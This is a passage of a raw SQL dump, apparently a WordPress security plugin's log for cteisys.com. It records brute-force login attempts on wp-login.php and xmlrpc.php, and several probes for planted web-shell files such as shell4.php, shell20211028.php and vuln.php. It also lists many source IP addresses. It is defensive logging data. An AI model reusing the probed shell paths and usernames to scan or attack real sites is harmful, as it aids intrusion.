0|0|cteisys.com/wp-login.php',0,0,0),('167.172.168.111',2813110383,'newd',0,1663977678.7019,7,'VJw4ajFvzHCST1xNcQ6yIibg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.85',3583549781,'joyce',0,1663977713.5555,152,'izTj3NZr8hSBJE60Mm7IUWsu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.195.148.190',868455614,'newd',0,1663978734.6371,7,'lV9WRPhZ4JQjMvxUo6AN2sYp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.105.95',2813094239,'newd',0,1663979788.2409,7,'fVWhyFTSNquIeDbrEU2HiZ0g','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.109.54.127',3496818303,'newd',0,1663980838.3426,7,'ljwrmzE69XN8TWA5B4yOsFIv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('137.184.117.52',2310567220,'newd',0,1663981888.1342,7,'EN3o54OpFlTLSVPxC8DkYuIs','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.117.225',2806478305,'newd',0,1663982944.4719,7,'mHA5jZhsTnxUSfNFRt21i647','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.195.237.203',3116625355,'joyce',0,1663983838.6228,152,'fQUBvHkzeKT7R2o0Nhw1sO4G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.21.38.119',3390383735,'newd',0,1663983995.0900,7,'Td1Ok67DizFeXMEsLJwxVvP2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.175.45.32',95366432,'newd',0,1663986797.7059,7,'j0JazOWtnq5YPvoAgTymVl76','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.175.45.32',95366432,'admin1',0,1663986799.1407,51,'rUec3wXf1ujR5AGd6l8vWMKV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.189.112.19',3116199955,'joyce',0,1663988144.7366,152,'KrAkc1PRD76LpMQnxwJNsX0i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.88.88.149',1347967125,'newd',0,1663988280.1138,7,'SsqQ1YVKARhb4mX6POgwjrFz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('118.24.106.172',1981311660,'newd',0,1663989372.9482,7,'ijYCqTVlEwGm2BWR5UxLcPAa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.102.148.187',1046910139,'joyce',0,1663989791.7224,152,'xXsrnjEmDZRS5MC2ugG8Tdak','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.236.35',3165056035,'newd',0,1663990450.4625,7,'kUVhbSWHoreyNDRJ3Epqx98z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.46.253',3515690749,'Joyce',0,1663991395.4602,51,'51s7hS6dPOaYNyTZuBUDtn0p','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.163.35.152',3265471384,'newd',0,1663991510.1576,7,'FRN7AzXEwrvQ3L8B4SVOKhxc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.140.0',2319748096,'newd',0,1663992572.3384,7,'4xFvMEw2U7YRH6JjciaqkXGA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.213.194.189',1607844541,'newd',0,1663992730.3571,7,'y8RSFsAvj6QPNguYiDeqMBW0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.213.194.189',1607844541,'vernon',0,1663992732.0892,51,'NTJFHdOcLyqnYRGXkh6Us1le','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.202.174.35',1389014563,'newd',0,1663993391.8422,7,'IyAaObnJjsZp9teBRQvoGYWz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.202.174.35',1389014563,'hwz',0,1663993393.4729,51,'YS8Bmsob0cANLz5MyD4x3HQ2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.163.35.152',3265471384,'newd',0,1663993631.7009,7,'Q80iv19YkexcUPuAzwThdNMp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.133.214.139',1736824459,'',0,1663994474.1741,55,'qWRi2nIs4zruml09FQ17dYgS','','19|0|0|0|cteisys.com/wp-stream.php',0,19,0),('103.133.214.139',1736824459,'',0,1663994476.5821,55,'3b7NnQP652JR8aO9hgMuvjfD','','19|0|0|0|cteisys.com/wp-blog-post.php',0,19,0),('103.133.214.139',1736824459,'',0,1663994478.0975,55,'htQDyg6vZUlAzHXIok73mGBs','','19|0|0|0|cteisys.com/wp-blockdown.php',0,19,0),('103.133.214.139',1736824459,'',0,1663994479.2359,55,'SVa4tRz5DuWwn6gNbMTYj1pX','','19|0|0|0|cteisys.com/wp-beckup.php',0,19,0),('103.133.214.139',1736824459,'',0,1663994481.0964,55,'PK3pw54stGJ687XZIRHfLWCo','','19|0|0|0|cteisys.com//wp-blockup.php',0,19,0),('103.133.214.139',1736824459,'',0,1663994481.0991,10,'PK3pw54stGJ687XZIRHfLWCo','','707|0|0|0|cteisys.com//wp-blockup.php',0,707,0),('103.133.214.139',1736824459,'',0,1663994483.4459,100,'61rvAmzthDfHWS3jB82XxLku','','13|0|0|0|cteisys.com/wp-content/uploads/wp-blockup.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994484.7606,100,'9QAMWu3blDjgrCfqmx1sO4vi','','13|0|0|0|cteisys.com/wp-content/uploads/wp-stream.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994486.3607,100,'4lIQHDkbjygxdopCZLMa2v0h','','13|0|0|0|cteisys.com/wp-admin/css/colors/blue/blue.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994487.4430,100,'yr8LSD4eQEgRaVNXGfxdFbkj','','13|0|0|0|cteisys.com/slicemap.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994494.0288,100,'O9ZSNTIAzygFGc4WpE3xUluJ','','13|0|0|0|cteisys.com/wp-content/uploads/wp-blockdown.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994495.2656,100,'asXu6HDbreNq8YnKyptQJz1f','','13|0|0|0|cteisys.com/wp-content/plugins/wp-sps/simple.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994496.5053,100,'17ay9Zs6OPLj0G3TN24h5cok','','13|0|0|0|cteisys.com/assets/images/images.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994497.7139,100,'UPbgeJ4A3jCwNIuELYDiZfcB','','13|0|0|0|cteisys.com/wp-admin/wp-admin.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994499.0048,100,'jibFaSGMT7vQucmsXqE4YzCy','','13|0|0|0|cteisys.com/wp-content/wp-content.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994501.6888,100,'5OrYbadnu1vLwftFTj8V3KgA','','13|0|0|0|cteisys.com/nc_assets/img/featured/600/600.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994502.9549,100,'lVgN1i4eGLMScOZfasDIXE0P','','13|0|0|0|cteisys.com/cgi-bin/cgi-bin.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994504.1697,100,'vD5T3Hi6VO08LAntrNJYSpsg','','13|0|0|0|cteisys.com/wp-includes/wp-includes.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994506.2561,100,'5xCotGQf1m80ZnS2KdwV9vur','','13|0|0|0|cteisys.com/wp-slicemap.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994507.6484,100,'oODlPgjuTBGJr4xhEqdQ9fkU','','13|0|0|0|cteisys.com/blog/wp-admin/css/colors/blue/blue.php',0,13,0),('103.133.214.139',1736824459,'',0,1663994508.8478,100,'69EGSpxazkn8bierWQRPwTVO','','13|0|0|0|cteisys.com/wp-includes/SimplePie/SimplePie.php',0,13,0),('202.21.38.119',3390383735,'newd',0,1663994679.6474,7,'KLBuEoaJZzXi57fVY8gGI6dF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('181.174.125.214',3048111574,'newd',0,1663995741.6883,7,'xOD2Vy7hAH0UM9WStbJpPIms','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.51.74',3328324426,'Joyce',0,1663996514.6669,51,'oLQiWjZqBFPlm1n9zbJa8YEM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.84.114.152',1565815448,'newd',0,1663996577.9655,7,'hPvLzGfS6AaFVYQquoEjwrnK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.84.114.152',1565815448,'enamad',0,1663996579.8126,51,'ViJLlc4twyknTpCUoxF60jW3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.106.71.219',2087339995,'newd',0,1663997792.8147,7,'k56GicJXqe0oCshTIW2yFEm4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('168.119.80.254',2826391806,'newd',0,1663998780.6540,7,'Bh5NuW32kUQw8fgrELCSJcMF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.88.110.165',391671461,'newd',0,1664000221.4698,7,'V37h0qEcOB9LaMoIJF5xRX2C','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.88.110.165',391671461,'testuser',0,1664000223.0264,51,'xEOD4wzbvRJfnWqLycBQ6Yha','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.127.126',2649128830,'newd',0,1664000809.9458,7,'TJGDVcBYioQ1XHMLmalv7Z3O','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('43.225.100.101',736191589,'newd',0,1664001275.6083,7,'du8qXGpc9hoL1iKQDx7B3gzW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('43.225.100.101',736191589,'admin919',0,1664001276.9564,51,'dh1KBYTyNzUoeJp9ZL8cFbk3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.106.208.127',3110785151,'newd',0,1664001308.8695,7,'p1QD27mRWfHcOCogS5XMk3J9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.106.208.127',3110785151,'erwan',0,1664001310.6624,51,'BYEtS5gKlvHFCwjToVZiU9Ru','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('212.110.92.155',3564002459,'newd',0,1664001842.6709,7,'F8cH4GvLTK6lIdzD9es0qfog','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.55.44.23',758590487,'newd',0,1664002873.7077,7,'wxtXSh4bzKyBOFr0luPijnG6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.244.167.101',3337922405,'newd',0,1664003891.5350,7,'Cc0EmW5yeUpF1XRa9TViYzuK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.175.45.32',95366432,'newd',0,1664004913.9687,7,'AFqEMViKUyhX1BOSgjYPI2GQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.175.45.32',95366432,'jason',0,1664004915.5191,51,'ArifogwMK37ys8aPe1V04THq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.144.87.29',2727368477,'newd',0,1664004926.9447,7,'3oqQxzZjCectbdOL8fFrWBuP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.162.229.147',765650323,'joyce',0,1664005014.8632,152,'R1LEpkUJ7hOl5dc2oWI8nfjV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.196.239.166',1757736870,'newd',0,1664005771.5435,152,'YBL485Pvtr2TzCcKObAZHfXi','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('104.196.239.166',1757736870,'newd',0,1664005772.3962,152,'v42hblWqLe6NuKMxQAP95zdH','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('104.196.239.166',1757736870,'newd',0,1664005773.2433,152,'tWaswSgXpZxqbjfcHRudnrOM','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('69.163.196.200',1168360648,'newd',0,1664005966.4708,7,'YwpavrzfFl9DC2ZLmQ4RTOVS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.170',3583549866,'joyce',0,1664006673.3406,152,'Eon584tbJRcjykYDXPqBaMKi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.8',1364734984,'newd',0,1664007014.4952,7,'Pu4rW50pB6HYiRocJZlkAa98','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('68.183.75.82',1152863058,'newd',0,1664008084.2987,7,'ctjYeB9WUfbzFaC6yIhQuJTr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('68.183.86.247',1152866039,'newd',0,1664009124.5880,7,'AxnkuJr0lqcWiym5SCRdUGwQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.249.74.213',1509509845,'joyce',0,1664009154.6891,152,'PnTF5EoZKvMWyBhYb3JpNSjL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.249.223.130',3355041666,'joyce',0,1664009758.1345,152,'fUd1eYnJZV4oXzmvFaR5ixD2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.57.186.73',792312393,'admin',0,1664009975.3807,152,'Cvz9Bwkqj6ndZcMDS4XgIGKy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.244.167.101',3337922405,'admin',0,1664010290.2943,51,'tyh1aC5QEXRFrviTHxBKSUeV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.241.174.216',2733747928,'admin',0,1664010321.4815,152,'WPjICgVyE7xkZ342hQwGeUNd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.156.175.35',3114053411,'joyce',0,1664010908.0714,152,'lGcRIfTK6aCLb7jzm8q50wvW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.152.164.156',1738056860,'admin',0,1664011139.9808,152,'OPTFKGDy0IoghNsUrj49ntic','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('187.32.211.193',3139490753,'admin',0,1664011333.8098,51,'wF4Wd3luREtPDbYegicMNHxp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.90.101.113',1046111601,'newd',0,1664011631.4556,152,'MsgvXOGm1VSYALjeC89rkWcB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.217.77',2732054861,'newd',0,1664011963.4094,152,'TNDUEBlq7mM0AZ1O4FQtGeRd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.227.161.192',1088659904,'newd',0,1664012043.8787,7,'VnNxRs7CfjkMJqQBOTt3oy6d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.227.161.192',1088659904,'simon',0,1664012045.9884,51,'KHmYe9gPIR0ENjlZd7b31U26','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.196.200',1168360648,'admin',0,1664012387.6688,51,'daU4mfnoeFCMqPH09srEv7zp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.81.81.219',1599164891,'newd',0,1664012500.6894,152,'ZanObmkfj1B0dELwloDhiNxy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1664013326.6132,152,'n73XMBKv6uYHz2dA0SscCiTr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.65.213.168',1296160168,'admin',0,1664013443.8526,51,'Wkd3ELBt9OFrsPV1myoU80DA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('88.198.218.4',1489426948,'',0,1664013891.8647,55,'SI5Cx3ykluYLBwUMR6DQqtNX','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('88.198.218.4',1489426948,'',0,1664013895.7347,55,'AicIQn7qZChXTjYkWFaH6mSf','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('88.198.218.4',1489426948,'',0,1664013899.1733,55,'QYnUwRkbvBiuy87EImN6xaAe','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('88.198.218.4',1489426948,'',0,1664013903.8664,55,'FQC6uThfmIaV4wdj1iJLNGrY','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('88.198.218.4',1489426948,'',0,1664013907.3833,55,'udnV5O3Z0HayWSAfxEkhJmiF','','19|0|0|0|cteisys.com/1index.php',0,19,0),('88.198.218.4',1489426948,'',0,1664013907.3895,10,'udnV5O3Z0HayWSAfxEkhJmiF','','707|0|0|0|cteisys.com/1index.php',0,707,0),('88.198.218.4',1489426948,'',0,1664013911.7813,55,'YWFcdC7shbA0LDIVfkH35XZ6','','19|0|0|0|cteisys.com/1index.php',0,19,0),('88.198.218.4',1489426948,'',0,1664013914.7208,55,'zGa52vKhFnQCdUoSJsDO9tPi','','19|0|0|0|cteisys.com/shell4.php',0,19,0),('88.198.218.4',1489426948,'',0,1664013918.0403,55,'tcATBbVkYj2RySHQfM1DCPEN','','19|0|0|0|cteisys.com/shell4.php',0,19,0),('88.198.218.4',1489426948,'',0,1664013922.2094,55,'lmyKpSJAUaTqHPZIeQFsdc73','','19|0|0|0|cteisys.com/ru.php',0,19,0),('88.198.218.4',1489426948,'',0,1664013925.9816,55,'uCrwq1tsUbDO7aIzXQkWljGF','','19|0|0|0|cteisys.com/ru.php',0,19,0),('88.198.218.4',1489426948,'',0,1664013930.0556,55,'d02B59uFqnj1YJyrRKOG7XIM','','19|0|0|0|cteisys.com/saudi.php',0,19,0),('88.198.218.4',1489426948,'',0,1664013934.0835,55,'nL7c3djzhfmGCVgXx4ObIJwe','','19|0|0|0|cteisys.com/saudi.php',0,19,0),('81.68.87.46',1363433262,'newd',0,1664014176.0429,152,'OEa8orhjVRSs0lvLGzCXQ9u2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.52.160.29',2973016093,'newd',0,1664014554.9472,152,'gcLmonvVXAjOe9kqJuwpGYEF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.60.32',3328326688,'Joyce',0,1664015177.2325,51,'iqH0nN1TlskYup3Lhw4Kd58R','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.68.87.46',1363433262,'newd',0,1664015410.8466,152,'wrTz2eBF6icASjso0lQtqmHp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.212.34.69',3168019013,'admin',0,1664015556.1054,51,'0IgG7VLqvzkjxHBiEZlYtXS9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.102.148.162',1046910114,'joyce',0,1664015854.0452,152,'exbI9madfZTBnQjq6WSEDriz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.37.28.132',1696930948,'newd',0,1664015919.0840,152,'OAf8Pho7mMXDI0xidUws2ygR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.156.175.51',3114053427,'joyce',0,1664016162.4503,152,'OP8cqniQ274MpIrlwYzm51HN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('145.239.30.120',2448367224,'newd',0,1664016625.8389,7,'FRtj1VQvIwyxqAHdCsh7kJmG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1664016824.5452,152,'eSh7cZJRTkI9MY0oBdF3laHA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.169.30.54',3198754358,'newd',0,1664017178.7226,152,'5ovJaQB2C0hkeiAEgPdKnlzZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.130.218.150',1736628886,'newd',0,1664017263.7708,7,'wGSXzshPQC3fo7rLc42UxZvE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.218.150',1736628886,'viavisual',0,1664017265.5240,51,'5Y6NVFMJHQGqIil19PapuhKE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.209.184.76',2261891148,'newd',0,1664017677.6806,7,'SvyCxu4hHYzdrFU2w76TjMDn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.189.6.184',1807550136,'Joyce',0,1664017927.6961,51,'vzA6nH3wdCNPh1DeFaGQUKME','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.230.247.143',2531719055,'newd',0,1664018070.0026,152,'dZinajlE9XNCkGb3crsxO4FL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.230.56.59',602290235,'newd',0,1664018492.1046,152,'GMVteCNBk9XlDU471Z5hInbd','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('35.230.56.59',602290235,'newd',0,1664018493.2224,152,'v8VUS2CfY64xlL7pnHJKIkQO','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('188.166.183.39',3165042471,'newd',0,1664018710.7963,7,'72fp5mWIb3eF0r4Ql1LdaJXD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.217.226.56',2094654008,'newd',0,1664018933.7253,152,'thg7vP0uICVkeGM64TYORFzc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.56.13',3515693069,'Joyce',0,1664019082.7172,51,'x6U3vhlq5misZeQwAbJXDfjt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('57.128.45.42',964701482,'',0,1664019114.5645,55,'0jAabrg7PSLh2Ifnc9vZlGKo','','19|0|0|0|cteisys.com/wp-content/vuln.php',0,19,0),('57.128.45.42',964701482,'',0,1664019120.3323,55,'fpQVwcPGrksaXZeB2ulWHAm4','','19|0|0|0|cteisys.com/wp-content/vuln.php',0,19,0),('8.210.174.93',148024925,'newd',0,1664019460.9248,152,'p2EybSZJGzCQFT31c4AsMuBd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.76.51',867322931,'newd',0,1664019758.7619,7,'ruMIQARpa7wh84o6Lyb1ZUmj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.244.239.41',3488935721,'newd',0,1664019838.1840,152,'BDqQSfMCbHOI5oNJK6rPX90a','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.29.131.126',1109230462,'newd',0,1664020374.0321,152,'fYmU4drbC3wVupvkDqcoTQZW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.69.154.241',3108346609,'newd',0,1664020408.7716,7,'UxEGpQsBHwcYDidylnh9eZ85','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.69.154.241',3108346609,'abcd',0,1664020410.2256,51,'tP5R8F4QA2hmyVHv1BnOc0XJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('119.18.52.177',1997681841,'newd',0,1664020745.0709,152,'pA8tRXmJgCyzNKjkQ9x5oulP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.131.68.19',1753433107,'newd',0,1664020810.4743,7,'ixSrcVBALOHv6p05mb2P1oTZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.27.238.234',1729883882,'newd',0,1664021694.4301,152,'oaVPIZqLyunCGJOXr3EH0i9S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.101.71.221',342181853,'newd',0,1664021861.5640,7,'K5FVk48e3fCcHW0o92DxtaN7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.211.94.153',601054873,'newd',0,1664022218.1825,152,'mUeFRjLxQAsWarI93M5TGvEB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.249.74.218',1509509850,'joyce',0,1664022594.6545,152,'vFphy2VW3HOPUlIg0rTEJxuc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.90.138.35',794462755,'vernon',0,1664022720.6849,51,'iEy8BIsSrzCHhKeuRaQkUtPj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.166.183.192',1738979264,'admin',0,1664022886.7125,51,'GvHS6r2mWg9ARj7plk0BCcqe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.76.135.15',2018281231,'newd',0,1664023497.7761,152,'7pz9wP4VBrGoSaM5x0e8QTfO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.46.122.50',2754509362,'admin',0,1664023902.3940,51,'iYWAZF9lE2M60sH3gbyr5eUo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('119.18.52.177',1997681841,'newd',0,1664024040.2245,152,'WnqQISEemKjFrA2XskMYBoOH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.35',3583549731,'joyce',0,1664024254.9697,152,'eEInh8fOaWxPsqF2GNCMvSV1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.0.140.186',2634058938,'newd',0,1664024399.4009,152,'9lqPgIu0z3LZTMCScxDEVwFm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.18.52.177',1997681841,'newd',0,1664025359.1336,152,'FlHpiGLK1vxaStXo6hJjrquP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.118',3583549814,'joyce',0,1664025413.7017,152,'kZQWtwLNHzoJdnmlpa62A3FR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.236.169.240',2917968368,'admin',0,1664025989.8344,51,'niPAcWJSqYUgTrZw9aIVQo4t','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.215.217.77',2732054861,'newd',0,1664026801.9783,152,'dwHtM7sfqTv3PScDexjbXIRU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.46.122.50',2754509362,'admin',0,1664027026.1075,51,'INMSOn9iZDtjF2mrH3XQKWw6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.106.201.134',795527558,'newd',0,1664027183.0217,152,'461vUIp3kzPlMwZsBfoXA8te','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.5.31',3103917343,'admin',0,1664028077.2368,51,'T7w4nCkiONGuEqaKPt5gcWm1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('149.129.181.108',2508305772,'newd',0,1664028151.0200,152,'Z3QrtRCXY7pgsq2nfTcJhLDw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.49.240',3328324080,'Joyce',0,1664028428.7501,51,'H1VlPtkswYQdNA8T7zI3yUnq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('122.17.148.164',2047972516,'newd',0,1664028696.0777,152,'LPI3F4akpOMW2rSXeQiyRCHl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('133.130.103.36',2239915812,'admin',0,1664029121.9410,51,'gnTyvuoJYEbehfRs4cGUVzdA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.64.218.102',574675558,'newd',0,1664030046.2188,152,'dwRfmX1eh6ktC3pruNSHxgUZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.27.133.69',2015069509,'admin',0,1664030146.5167,51,'8JBhzqvcieoOQsVl4A1nDgdC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.102.27.195',1382423491,'joyce',0,1664030148.8268,152,'28VKIExqLao7eTMOdsPucYtN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.68.196.90',1950663770,'newd',0,1664030581.1758,152,'2RGeIwfYAqBE3pshrmtDjkcu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.22.202.244',2769734388,'newd',0,1664030598.6808,7,'coWQSYBqFZdELl23zOa18kAe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.22.202.244',2769734388,'antawn',0,1664030599.9132,51,'wZfO9pVDELmo0vUs4ayTRINe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('212.38.40.215',3559270615,'newd',0,1664030989.2132,152,'ia5Fu8mIVv0EAgjBCMRW6s2d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.141.164',2806484388,'admin',0,1664031196.1977,51,'01JRKHjoaTcv5piSYEZtCrXg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.229',3583549925,'joyce',0,1664031412.1973,152,'2rAyPWUo04L8veQFVg57YRju','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.17.110',2884899182,'newd',0,1664031516.2167,152,'vT6s5lKbS3wVB8YOW1CuHtf9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.111.30.40',1735335464,'newd',0,1664031916.2124,152,'Z8AepmFozBhfuYTbvlGJ1xU4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1664032250.9085,7,'NMkX2fRQWz4KejlqPaUJ1mIh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.57.186.73',792312393,'newd',0,1664032853.6287,152,'NnTb2Jef6EiBIGS3a4YRcDOK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.107.242.103',795603559,'newd',0,1664033290.9867,7,'dlrgA16wIKPhTZGY5Uk3tsoD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.68.87.46',1363433262,'newd',0,1664033425.6789,152,'HE4BAUVDRgFla3WSnoCTujiM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('131.72.236.73',2202594377,'newd',0,1664033818.5384,152,'zaVyFSthBiQcTLCOPgkuXpN0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.37.254.19',3240492563,'joyce',0,1664033916.4736,152,'O7VkMoKd5G3HLFtIlXZmvqPD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.130.218.189',1736628925,'newd',0,1664034353.2813,7,'tRhkyB5iu0j3KPCrwWdfEMve','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('97.79.239.127',1632628607,'newd',0,1664034379.5062,152,'itjSH9lcKhkBsWVbDNO1CUJY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.40',3583549736,'joyce',0,1664034537.4030,152,'dFaTbinerq2MoU5LE137HABc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),(